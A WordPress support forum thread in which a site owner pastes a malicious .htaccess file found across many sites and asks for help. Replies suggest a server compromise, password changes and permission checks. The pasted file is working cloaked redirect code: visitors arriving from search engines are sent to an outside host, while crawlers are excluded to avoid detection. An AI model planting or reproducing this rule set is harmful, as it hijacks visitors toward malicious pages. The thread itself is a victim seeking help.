WordPress.org

Forums

.htaccess Attack! (7 posts)

  1. welshhuw
    Member
    Posted 4 years ago #

    Hi,

    I have been finding some .htaccess files containg the following within my wordpress installation. Also, we have another 20ish sites on the same server, and the files have appeared there too. (These sites are html/css sites run on our custom cms)

    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
    RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
    # exgocgkctswo

    I have been deleting the infected files but can someone help me shed some light on what it is and how it got there! My server guys are saying it something to do with a WP plugin?

    Thanks

  2. Well ... what plugins are you running?

    It looks more like a server hack to me, but it could be a bad plugin, so start by disabling and deleting the ones you don't need AND changing your server and wordpress passwords. Just in case.

  3. welshhuw
    Member
    Posted 4 years ago #

    Hi,

    Thanks for your reply. Here is the list of plugins I have running. Over about 5 WP installations.

    Akismet
    All In One Seo Pack
    Google XML Sitemaps
    wp Smush.it
    Automatic SEO links
    cForms
    Featured Content Gallery
    Super Image Plugin
    Video Widget
    WP Security Scan
    FeedWordpress
    TDO Mini Forms

    I have deleted and disable the ones I wasnt using and didnt need.

    Any advice on where this could've come from would be grateful!!

    Thanks again.

  4. None of those should be causing this behavior.

    Read this: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Your server may be under attack.

  5. welshhuw
    Member
    Posted 4 years ago #

    Thanks but the server guys are abs. positive its due to plugins...!?

    Have deleted all infected files and checked all plugins are up to date.

  6. Yeah, a lot of the times server guys are 100% sure it's plugins. Generally it's not. I mean, yes, SOME plugins are made by hackers, but it's more common that a botched plugin install leaves your server insecure, which opens you to server hacks. And even more common than THAT is a server insecure on a level you, as a user, cannot fix, and your host must.

    Change your server password, your database password, and your blog passwords.

    Check the folder/file permissions on your account. Do the best you can.

  7. welshhuw
    Member
    Posted 4 years ago #

    Did all of the above and now its back!!

    But what I can figure out is that the infected files have a later date than when I cleaned them all out???

    I know I would have deleted/cleaned them out so is it possible for them to 'back-date' the infected files?

Topic Closed

This topic has been closed to new replies.

About this Topic